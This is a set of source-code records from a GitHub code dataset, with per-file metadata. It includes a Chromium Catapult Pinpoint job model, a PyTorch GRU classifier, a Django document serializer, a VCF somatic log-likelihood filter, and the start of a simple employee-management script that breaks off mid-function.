%\n len(differences))\n\n title = '%s %s' % (_ROUND_PUSHPIN, status)\n header = '\\n'.join((title, self.url))\n\n # Body.\n body = '\\n\\n'.join(commit_details)\n if sheriff:\n owner = sheriff\n body += '\\n\\nAssigning to sheriff %s because \"%s\" is a roll.' % (\n sheriff, commit_info['subject'])\n\n # Footer.\n footer = ('Understanding performance regressions:\\n'\n ' http://g.co/ChromePerformanceRegressions')\n\n # Bring it all together.\n comment = '\\n\\n'.join((header, body, footer))\n current_bug_status = self._GetBugStatus()\n if (not current_bug_status or\n current_bug_status in ['Untriaged', 'Unconfirmed', 'Available']):\n # Set the bug status and owner if this bug is opened and unowned.\n self._PostBugComment(comment, status='Assigned',\n cc_list=sorted(cc_list), owner=owner)\n else:\n # Only update the comment and cc list if this bug is assigned or closed.\n self._PostBugComment(comment, cc_list=sorted(cc_list))\n\n def Fail(self):\n self.exception = traceback.format_exc()\n\n title = _CRYING_CAT_FACE + ' Pinpoint job stopped with an error.'\n comment = '\\n'.join((title, self.url, '', sys.exc_value.message))\n self._PostBugComment(comment)\n\n def _Schedule(self):\n # Set a task name to deduplicate retries. This adds some latency, but we're\n # not latency-sensitive. If Job.Run() works asynchronously in the future,\n # we don't need to worry about duplicate tasks.\n # https://github.com/catapult-project/catapult/issues/3900\n task_name = str(uuid.uuid4())\n try:\n task = taskqueue.add(\n queue_name='job-queue', url='/api/run/' + self.job_id,\n name=task_name, countdown=_TASK_INTERVAL)\n except apiproxy_errors.DeadlineExceededError:\n task = taskqueue.add(\n queue_name='job-queue', url='/api/run/' + self.job_id,\n name=task_name, countdown=_TASK_INTERVAL)\n\n self.task = task.name\n\n def Run(self):\n \"\"\"Runs this Job.\n\n Loops through all Attempts and checks the status of each one, kicking off\n tasks as needed. Does not block to wait for all tasks to finish. Also\n compares adjacent Changes' results and adds any additional Attempts or\n Changes as needed. If there are any incomplete tasks, schedules another\n Run() call on the task queue.\n \"\"\"\n self.exception = None # In case the Job succeeds on retry.\n self.task = None # In case an exception is thrown.\n\n try:\n if self.state.comparison_mode:\n self.state.Explore()\n work_left = self.state.ScheduleWork()\n\n # Schedule moar task.\n if work_left:\n self._Schedule()\n else:\n self._Complete()\n except BaseException:\n self.Fail()\n raise\n finally:\n # Don't use `auto_now` for `updated`. 
When we do data migration, we need\n # to be able to modify the Job without changing the Job's completion time.\n self.updated = datetime.datetime.now()\n try:\n self.put()\n except (datastore_errors.Timeout,\n datastore_errors.TransactionFailedError):\n # Retry once.\n self.put()\n except datastore_errors.BadRequestError:\n if self.task:\n queue = taskqueue.Queue('job-queue')\n queue.delete_tasks(taskqueue.Task(name=self.task))\n self.task = None\n\n # The _JobState is too large to fit in an ndb property.\n # Load the Job from before we updated it, and fail it.\n job = self.key.get(use_cache=False)\n job.task = None\n job.Fail()\n job.updated = datetime.datetime.now()\n job.put()\n raise\n\n def AsDict(self, options=None):\n d = {\n 'job_id': self.job_id,\n\n 'arguments': self.arguments,\n 'bug_id': self.bug_id,\n 'comparison_mode': self.state.comparison_mode,\n 'user': self.user,\n\n 'created': self.created.isoformat(),\n 'updated': self.updated.isoformat(),\n 'exception': self.exception,\n 'status': self.status,\n }\n if not options:\n return d\n\n if OPTION_STATE in options:\n d.update(self.state.AsDict())\n if OPTION_TAGS in options:\n d['tags'] = {'tags': self.tags}\n return d\n\n def _PostBugComment(self, *args, **kwargs):\n if not self.bug_id:\n return\n\n issue_tracker = issue_tracker_service.IssueTrackerService(\n utils.ServiceAccountHttp())\n issue_tracker.AddBugComment(self.bug_id, *args, **kwargs)\n\n def _GetBugStatus(self):\n if not self.bug_id:\n return None\n\n issue_tracker = issue_tracker_service.IssueTrackerService(\n utils.ServiceAccountHttp())\n issue_data = issue_tracker.GetIssue(self.bug_id)\n return issue_data.get('status')\n\n\ndef _FormatCommitForBug(commit_info):\n subject = '%s by %s' % (commit_info['subject'], commit_info['author'])\n return '\\n'.join((subject, commit_info['url']))\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/dashboard/dashboard/pinpoint/models/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 10499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dashboard.pinpoint.models.job_state.COMPARISON_MODES", "line_number": 31, "usage_type": "attribute"}, {"api_name": "dashboard.pinpoint.models.job_state", "line_number": 31, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 40, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 40, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 44, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.DateTimeProperty", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.DateTimeProperty", "line_number": 50, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 50, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 54, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 54, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.TextProperty", "line_number": 58, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 58, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.JsonProperty", "line_number": 61, "usage_type": "call"}, {"api_name": 
"google.appengine.ext.ndb", "line_number": 61, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.IntegerProperty", "line_number": 65, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 65, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 68, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 68, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.PickleProperty", "line_number": 70, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 70, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.JsonProperty", "line_number": 72, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 72, "usage_type": "name"}, {"api_name": "dashboard.pinpoint.models.job_state.JobState", "line_number": 94, "usage_type": "call"}, {"api_name": "dashboard.pinpoint.models.job_state", "line_number": 94, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 120, "usage_type": "attribute"}, {"api_name": "dashboard.pinpoint.models.results2.ScheduleResults2Generation", "line_number": 141, "usage_type": "call"}, {"api_name": "dashboard.pinpoint.models.results2", "line_number": 141, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Error", "line_number": 142, "usage_type": "attribute"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 142, "usage_type": "name"}, {"api_name": "dashboard.common.utils.GetSheriffForAutorollCommit", "line_number": 174, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 174, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.exc_value", "line_number": 215, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 223, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue.add", "line_number": 225, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 225, "usage_type": "name"}, {"api_name": "google.appengine.runtime.apiproxy_errors.DeadlineExceededError", "line_number": 228, "usage_type": "attribute"}, {"api_name": "google.appengine.runtime.apiproxy_errors", "line_number": 228, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.add", "line_number": 229, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 229, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 263, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 263, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors.Timeout", "line_number": 266, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 266, "usage_type": "name"}, {"api_name": "google.appengine.api.datastore_errors.TransactionFailedError", "line_number": 267, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 267, "usage_type": "name"}, {"api_name": "google.appengine.api.datastore_errors.BadRequestError", "line_number": 270, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 270, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Queue", "line_number": 272, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 272, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Task", "line_number": 273, 
"usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 273, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "dashboard.services.issue_tracker_service.IssueTrackerService", "line_number": 312, "usage_type": "call"}, {"api_name": "dashboard.services.issue_tracker_service", "line_number": 312, "usage_type": "name"}, {"api_name": "dashboard.common.utils.ServiceAccountHttp", "line_number": 313, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 313, "usage_type": "name"}, {"api_name": "dashboard.services.issue_tracker_service.IssueTrackerService", "line_number": 320, "usage_type": "call"}, {"api_name": "dashboard.services.issue_tracker_service", "line_number": 320, "usage_type": "name"}, {"api_name": "dashboard.common.utils.ServiceAccountHttp", "line_number": 321, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 321, "usage_type": "name"}]} +{"seq_id": "44436907436", "text": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass BoWGRUClassifier(nn.Module):\n \"\"\"\n Used to represent the layers our ANN will consist of together with the activation function.\n \"\"\"\n def __init__(self, input_size, hidden_dim, output_dim, n_layers, bidirectional, dropout):\n super(BoWGRUClassifier, self).__init__()\n self.rnn = nn.GRU(input_size=input_size,\n hidden_size=hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n batch_first=True,\n dropout=0 if n_layers < 2 else dropout)\n self.out = nn.Linear(hidden_dim * 2 if bidirectional else hidden_dim, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, bow_gru_matrix):\n # bow_gru_matrix = [batch size, sent len, emb dim]\n _, hidden = self.rnn(bow_gru_matrix)\n # hidden = [n layers * n directions, batch size, emb dim]\n if self.rnn.bidirectional:\n hidden = self.dropout(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1))\n else:\n hidden = self.dropout(hidden[-1, :, :])\n # hidden = [batch size, hid dim]\n output = self.out(hidden)\n # output = [batch size, out dim]\n return output\n\n", "repo_name": "cmimprota/CSR", "sub_path": "algorithms/bow_gru/bow_gru_model.py", "file_name": "bow_gru_model.py", "file_ext": "py", "file_size_in_byte": 1342, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "10301133016", "text": "import datetime\n\nfrom django.contrib.auth.models import Group\nfrom django.utils import timezone\nfrom rest_framework.exceptions import ValidationError\n\nfrom .models import *\nfrom rest_framework import serializers\n\nclass DocumentSerializer(serializers.ModelSerializer):\n check_date = serializers.SerializerMethodField()\n\n class Meta:\n model = 
Document\n fields = ['id', 'title', 'text', 'file', 'date_created', 'date_expired', 'status', 'document_root', 'check_date']\n\n\n def get_check_date(self, obj):\n check_date = ''\n date_expired = obj.date_expired\n date_now = datetime.datetime.date(timezone.now())\n if date_now > date_expired:\n check_date = 'dead'\n obj.status = check_date\n obj.save()\n return check_date\n\n def create(self, validated_data):\n user = validated_data.pop('user')\n group = user.groups.all()[0].name\n doc_root = validated_data['document_root']\n if group == 'general' and doc_root in ['public', 'private', 'secret']:\n document = Document.objects.create(**validated_data)\n elif group == 'president':\n document = Document.objects.create(**validated_data)\n else:\n raise ValidationError(\"You have no permission!\")\n return document\n", "repo_name": "rzhvn1/Military_CRM", "sub_path": "CRM_project/documents/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.serializers.SerializerMethodField", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "22471037342", "text": "import argparse\nimport sys\nimport os\nimport re\nimport vcfpy\nimport tempfile\nimport csv\nimport math\nfrom collections import OrderedDict\n\ndef define_parser():\n parser = argparse.ArgumentParser('somatic-llr-filter')\n parser.add_argument(\n \"input_vcf\",\n help=\"A VCF file with at least two samples (tumor and normal) and readcount information\"\n )\n parser.add_argument(\n \"output_vcf\",\n help=\"Path to write the output VCF file\"\n )\n parser.add_argument(\n \"--sequence-error-rate\",\n help=\"expected sequencing error rate (range 0 to 1) - default 0.005\",\n type=float,\n default=0.005\n )\n parser.add_argument(\n \"--tumor-purity\",\n help=\"tumor purity (range 0 to 1) - default 1\",\n type=float,\n default=1\n )\n parser.add_argument(\n \"--normal-contamination-rate\",\n help=\"normal contamination rate (range 0 to 1) - default 0\",\n type=float,\n default=0\n )\n parser.add_argument(\n \"--allele-depth-field\",\n help=\"field corresponding to allele depth - default AD\",\n default=\"AD\"\n )\n parser.add_argument(\n \"--site-depth-field\",\n help=\"field corresponding to site depth - default DP\",\n default=\"DP\"\n )\n parser.add_argument(\n \"--tumor-sample-name\",\n help=\"name of the vcf sample corresponding to the tumor - default TUMOR\",\n default=\"TUMOR\"\n )\n parser.add_argument(\n \"--normal-sample-name\",\n help=\"name of the vcf sample corresponding to the normal - default NORMAL\",\n default=\"NORMAL\"\n )\n parser.add_argument(\n \"--llr-field\",\n help=\"name of the vcf info field in which to store the log-likelihood ratio value\",\n 
default=\"LLR\"\n )\n parser.add_argument(\n \"--somatic-field\",\n help=\"name of the vcf info field in which to store the classification call from this script (somatic = 0 or 1)\",\n default=\"SOMATIC\"\n )\n parser.add_argument(\n \"--llr-threshold\",\n type=float,\n help=\"if set, variants that are not somatic or have an LLR value below this threshold will have their FILTER field set appropriately\"\n )\n parser.add_argument(\n \"--filter-field\",\n help=\"if --llr-threshold is given, then failing variants will have this string added to their FILTER field\",\n default=\"SOMATIC_LLR\"\n )\n \n parser.add_argument('-w', \"--overwrite\", action='store_true',\n help=\"by default, this tool will raise an exception if the LLR or SOMATIC fields already exist in the VCF. This flag allows existing fields to be overwritten.\"\n )\n return parser\n\n\ndef create_vcf_reader(args):\n vcf_reader = vcfpy.Reader.from_path(args.input_vcf)\n #do some sanity checking\n sample_names = vcf_reader.header.samples.names\n is_multi_sample = len(sample_names) > 1\n if(not is_multi_sample):\n vcf_reader.close()\n raise Exception(\"A multisample VCF with both tumor and normal data is required\")\n\n if not args.tumor_sample_name in sample_names:\n raise Exception(\"Could not find tumor sample name {} in sample names\".format(args.tumor_sample_name))\n if not args.normal_sample_name in sample_names:\n raise Exception(\"Could not find normal sample name {} in sample names\".format(args.normal_sample_name))\n\n #check for needed format fields\n if not args.allele_depth_field in vcf_reader.header.format_ids():\n vcf_reader.close()\n raise Exception(\"No \" + args.allele_depth_field + \" format field found. Annotate your VCF with readcounts first\")\n if not args.site_depth_field in vcf_reader.header.format_ids():\n vcf_reader.close()\n raise Exception(\"No {} format field found. Annotate your VCF with readcounts first\".format(args.site_depth_field))\n\n return vcf_reader\n\n\ndef create_vcf_writer(args, vcf_reader):\n output_file = args.output_vcf\n\n new_header = vcf_reader.header.copy()\n\n #check/add llr field in header\n if args.llr_field in vcf_reader.header.info_ids():\n if args.overwrite: #verify compatibility\n if not vcf_reader.header.get_info_field_info(args.llr_field).type == \"Float\":\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must be of type 'Float'. Either modify this, or choose a new {} field\".format(args.llr_field,args.llr_field))\n if not vcf_reader.header.get_info_field_info(args.llr_field).number == 1:\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must have Number '1'. Either modify this, or choose a new {} field\".format(args.llr_field,args.llr_field))\n else: \n vcf_reader.close()\n raise Exception(\"INFO already contains a {} field. Choose a different label, or use the --overwrite flag to retain this field description and overwrite values\".format(args.llr_field))\n\n else:\n od = OrderedDict([('ID', args.llr_field), ('Number', '1'), ('Type', 'Float'), ('Description', 'log-likelihood ratio for the binomial filter call')])\n new_header.add_info_line(od)\n\n #check/add somatic field in header\n if args.somatic_field in vcf_reader.header.info_ids():\n if args.overwrite:\n if not vcf_reader.header.get_info_field_info(args.somatic_field).type == \"Flag\":\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must be of type 'Flag'. 
Either modify this, or choose a new {} field\".format(args.somatic_field,args.somatic_field))\n if not vcf_reader.header.get_info_field_info(args.somatic_field).number == 0:\n vcf_reader.close()\n raise Exception(\"{} field to be overwritten must have Number '0'. Either modify this, or choose a new {} field\".format(args.somatic_field,args.somatic_field))\n else:\n vcf_reader.close()\n raise Exception(\"INFO already contains a {} field. Choose a different label, or use the --overwrite flag to retain this field description and overwrite values\".format(args.somatic_field))\n else:\n od = OrderedDict([('ID', args.somatic_field), ('Number', '0'), ('Type', 'Flag'), ('Description', 'Is a somatic mutation')])\n new_header.add_info_line(od)\n\n #check/add FILTER field in header\n if args.llr_threshold is not None: #filtering may not even be specified\n if args.filter_field in vcf_reader.header.filter_ids():\n if not args.overwrite:\n vcf_reader.close()\n raise Exception(\"FILTER {} already exists. Choose a different --filter-field, or use the --overwrite flag to retain this filter description and overwrite values\".format(args.filter_field))\n else:\n od = OrderedDict([('ID', args.filter_field), ('Description', 'Is a somatic mutation with LLR lower than {}'.format(args.llr_threshold))])\n new_header.add_filter_line(od)\n\n\n return vcfpy.Writer.from_path(output_file, new_header)\n\n\n#for each call possibility (ref, germ het, germ hom, etc)\n#calculate the llr here\ndef calc_llr(normal_expect, tumor_expect, normal_ref, normal_var, tumor_ref, tumor_var):\n return(normal_ref * math.log(1-normal_expect) +\n normal_var * math.log(normal_expect) +\n tumor_ref * math.log(1-tumor_expect) +\n tumor_var * math.log(tumor_expect))\n\ndef get_llr(call, normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect):\n if call == \"Germline_het\":\n return(calc_llr(heterozygous_expect, heterozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Germline_hom\":\n return(calc_llr(homozygous_expect, homozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"LOH_ref\":\n return(calc_llr(heterozygous_expect, error_rate,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"LOH_variant\":\n return(calc_llr(heterozygous_expect, homozygous_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"NotSomatic\":\n return(calc_llr(error_expect, error_expect,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Reference\":\n return(calc_llr(error_rate, error_rate,\n normal_ref, normal_var, tumor_ref, tumor_var))\n elif call == \"Somatic\":\n return(calc_llr(error_rate + (tumor_freq / tumor_purity * normal_contamination_rate), tumor_freq,\n normal_ref, normal_var, tumor_ref, tumor_var))\n raise Exception('Call \"' + call + '\" is not a recognized type')\n\n\ndef make_call(normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect):\n #Want to test several models and pick the most likely one\n #Reference: normal expectation is 0.001 and tumor expectation is 0.01\n #Germline Het: normal expectation is 0.5 and tumor expectation is 0.5\n #Somatic Het: normal expectation is 0.001 and tumor expectation in 0.5\n #Germline Homozygote: normal expectation is 0.999 and tumor expectation is 0.999\n #LOH (variant): germline is 0.5 and 
tumor is 0.999\n #LOH (ref): germline is 0.5 and tumor is 0.001\n\n marginal_probability = None\n max_llr = None\n max2_llr = None\n max_call = None\n max2_call = None\n llr = 0\n\n if(tumor_var == 0): #special case that chokes some of the log code. LLR is always zero if we have no supp reads\n return([0,\"Reference\"])\n\n call_types = [\"Germline_het\", \"Germline_hom\", \"LOH_ref\", \"LOH_variant\", \"NotSomatic\", \"Reference\", \"Somatic\"];\n for call in call_types:\n llr = get_llr(call, normal_ref, normal_var, tumor_ref, tumor_var, error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, tumor_purity, normal_contamination_rate, error_expect)\n if marginal_probability is None:\n marginal_probability=llr\n elif llr > marginal_probability:\n marginal_probability = llr + math.log(1 + math.exp(marginal_probability-llr))\n else:\n marginal_probability = marginal_probability + math.log(1 + math.exp(llr-marginal_probability))\n\n max_llr_def = (max_llr is not None)\n max2_llr_def = (max2_llr is not None)\n\n if not (max_llr_def and (llr < max_llr)):\n #save the second-place, store the new best\n max2_call = max_call\n max2_llr = max_llr\n max_llr = llr\n max_call = call\n elif not (max2_llr_def and (llr < max2_llr)):\n max2_call = call\n max2_llr = llr\n #end for\n\n #get the final llr\n if max_llr is not None:\n llr = max_llr-max2_llr\n else:\n llr = 0\n\n #get the final call\n if max_call is None:\n max_call = \"-\"\n\n return (llr,max_call)\n\n\n\ndef main(args_input = sys.argv[1:]):\n parser = define_parser()\n args = parser.parse_args(args_input)\n\n #these aren't going to change per site\n homozygous_expect = 1 - args.sequence_error_rate;\n heterozygous_expect = 0.5;\n\n vcf_reader = create_vcf_reader(args)\n vcf_writer = create_vcf_writer(args, vcf_reader)\n\n for entry in vcf_reader:\n #collect the needed info\n ref = entry.REF\n alts = entry.ALT\n\n #this code will mostly handle multiple alleles, as written, but the issue is that there is\n #no way to set the INFO (SOMATIC) field appropriately when there are multiple alleles per line,\n # so we're going to restrict it to decomposed VCFs - one variant per line\n if len(alts) > 1:\n raise Exception(\"site with multiple alleles detected. This tool requires a decomposed vcf (one allele per line) so that INFO fields can be set appropriately\")\n\n def getFormatField(sample_name, field_name):\n if(sample_name in entry.call_for_sample and field_name in entry.call_for_sample[sample_name].data):\n return entry.call_for_sample[sample_name].data[field_name]\n return(\"NA\")\n\n def missingVals(arr):\n for i in arr:\n if i == \"NA\":\n return True\n return False\n\n ad_nrm = getFormatField(args.normal_sample_name,args.allele_depth_field)\n ad_tum = getFormatField(args.tumor_sample_name,args.allele_depth_field)\n normal_depth = getFormatField(args.normal_sample_name,args.site_depth_field)\n tumor_depth = getFormatField(args.tumor_sample_name,args.site_depth_field)\n normal_ref = ad_nrm[0]\n tumor_ref = ad_tum[0]\n\n call = \"\"\n llr = 0\n\n #TODO parse out per alt, retrieve calls\n for i in range(1,(len(alts)+1)): #right now, this will only ever be one, due to above check. 
Could be expanded to support multiple alleles - see above\n if(ad_nrm == \"NA\"):\n normal_var = \"NA\"\n else:\n normal_var = ad_nrm[i]\n if(ad_tum == \"NA\"):\n tumor_var = \"NA\"\n else:\n tumor_var = ad_tum[i]\n \n #if neither has any depth or vals or missing, then fail this up front\n if missingVals([normal_var,tumor_var,tumor_depth,normal_depth]) or (tumor_depth + normal_depth == 0):\n (llr,call) = (0,\"Reference\")\n continue\n \n #weighted average of the frequencies\n error_expect = (tumor_var + normal_var)/(tumor_depth + normal_depth)\n #dave had this line in there, but I don't know why...\n #error_expect ||= error_rate\n if error_expect == 1:\n error_expect = 1 - args.sequence_error_rate\n\n #handle case where depth is zero or missing\n if tumor_depth == 0:\n tumor_freq = 0\n else:\n tumor_freq = tumor_var/tumor_depth\n\n if tumor_freq == 0:\n tumor_freq = args.sequence_error_rate\n elif tumor_freq == 1:\n tumor_freq = tumor_freq - args.sequence_error_rate\n\n (llr,call) = make_call(normal_ref, normal_var, tumor_ref, tumor_var, args.sequence_error_rate, heterozygous_expect,\n homozygous_expect, tumor_freq, args.tumor_purity, args.normal_contamination_rate, error_expect)\n\n #Store it back in the entry before writing out.\n if call == \"Somatic\":\n entry.INFO[args.somatic_field] = 1\n else:\n entry.INFO.pop('SOMATIC',None)\n\n entry.INFO[args.llr_field] = llr\n\n #do filtering if specified\n if args.llr_threshold is not None:\n if (not call == \"Somatic\") or (llr < args.llr_threshold):\n entry.add_filter(args.filter_field);\n\n vcf_writer.write_record(entry)\n\n vcf_reader.close()\n vcf_writer.close()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "genome/docker-somatic-llr-filter", "sub_path": "somatic_llr_filter.py", "file_name": "somatic_llr_filter.py", "file_ext": "py", "file_size_in_byte": 15116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "vcfpy.Reader.from_path", "line_number": 87, "usage_type": "call"}, {"api_name": "vcfpy.Reader", "line_number": 87, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 130, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 146, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 156, "usage_type": "call"}, {"api_name": "vcfpy.Writer.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "vcfpy.Writer", "line_number": 160, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 166, "usage_type": "call"}, {"api_name": "math.log", "line_number": 167, "usage_type": "call"}, {"api_name": "math.log", "line_number": 168, "usage_type": "call"}, {"api_name": "math.log", "line_number": 169, "usage_type": "call"}, {"api_name": "math.log", "line_number": 224, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 224, "usage_type": "call"}, {"api_name": "math.log", "line_number": 226, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 226, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 256, "usage_type": "attribute"}]} +{"seq_id": "6320645785", "text": "import datetime\n# This is an employee class and it is a parent class\n# This function will get only integer value\nemployee_designations = (\"Manager\", \"Supervisor\", \"Supervisor Backup\", \"Sales Man\", \"Office Boy\")\n\n\ndef input_number(message):\n while True:\n try:\n 
user_input = int(input(message))\n\n        except ValueError:\n            print(\"Not an integer value! Try again\")\n            continue\n        else:\n            return user_input\n            break\n\n\ndef designation():\n    while True:\n\n        choice = input_number(\"Choose Designation\\n1-Manager\\n2-Supervisor\\n3-Supervisor Backup\\n4-Sales Man\\n5-Office Boy\")\n        if choice > 0 and choice < 6:\n            return employee_designations[choice-1]\n            break\n        else:\n            print(\"value must be an integer from 1 - 5\")\n\n\n\nclass Employee:\n    e_id = 0\n\n    def __init__(self, nam, des, sal, exp, rep=None):\n\n        self.Name = nam\n        self.Roll = des\n        self.Salary = sal\n        self.Report = rep\n        self.Experience = exp\n        self.Manager_Remarks = \"none\"\n        self.employee_id = 0\n# new comment by me\n\n    def showemployees(self, lst):\n        print(\"--------------------------------------------\")\n        print(\"           All Employees Data\")\n        print(\"--------------------------------------------\")\n        for i in lst:\n            print(\"Employee ID = \", i.employee_id)\n            print(\"Employee Name = \", i.Name)\n            print(\"Employee Designation = \", i.Roll)\n            print(\"Employee Report = \", i.Report)\n            print(\"Employee Experience = \", i.Experience)\n            print(\"Manager Remarks = \", i.Manager_Remarks)\n            print(\"--------------------------------------------\")\n\n    def set_id(self, id):\n        self.employee_id = id\n\n\nclass EmployeeManager(Employee):\n    def __init__(self):\n        pass\n\n    def show_report(self, lst):\n\n        search_employee = input(\"Enter employee id to search report\")\n        s_m = int(search_employee)\n\n        for i in lst:\n            if i.employee_id == s_m:\n                print(\"--------------------------------------------\")\n                print(\"           Employee Report\")\n                print(\"--------------------------------------------\")\n                print(\"Employee ID = \", i.employee_id)\n                print(\"Employee Name = \", i.Name)\n                print(\"Employee Designation = \", i.Roll)\n                print(\"Employee Report = \", i.Report)\n                print(\"Last Remarks = \", i.Manager_Remarks)\n                remarks = input(\"Enter Remarks\")\n                i.Manager_Remarks = remarks\n                print(\"--------------------------------------------\")\n                break\n\n        else:\n            print(\"employee does not exist\")\n\n\n# create function to manage employee\n# if progress is less than 5 then do not assign other task\n\n\nclass EmployeeGeneral(Employee):\n    def __init__(self):\n        pass\n\n    def create_report(self, lst):\n        search_employee = input(\"Enter employee id to enter report\")\n        s_m = int(search_employee)\n\n        for i in lst:\n            if i.employee_id == s_m:\n                print(\"--------------------------------------------\")\n                print(\"           Employee Report\")\n                print(\"--------------------------------------------\")\n                print(\"Employee ID = \", i.employee_id)\n                print(\"Employee Name = \", i.Name)\n                print(\"Employee Designation = \", i.Roll)\n                i.Report = int(input(\"Enter Report (1 - 10) = \"))\n\n\n                print(\"--------------------------------------------\")\n                break\n\n        else:\n            print(\"employee does not exist\")\n\n    def manager_remarks(self, lst):\n\n        search_employee = 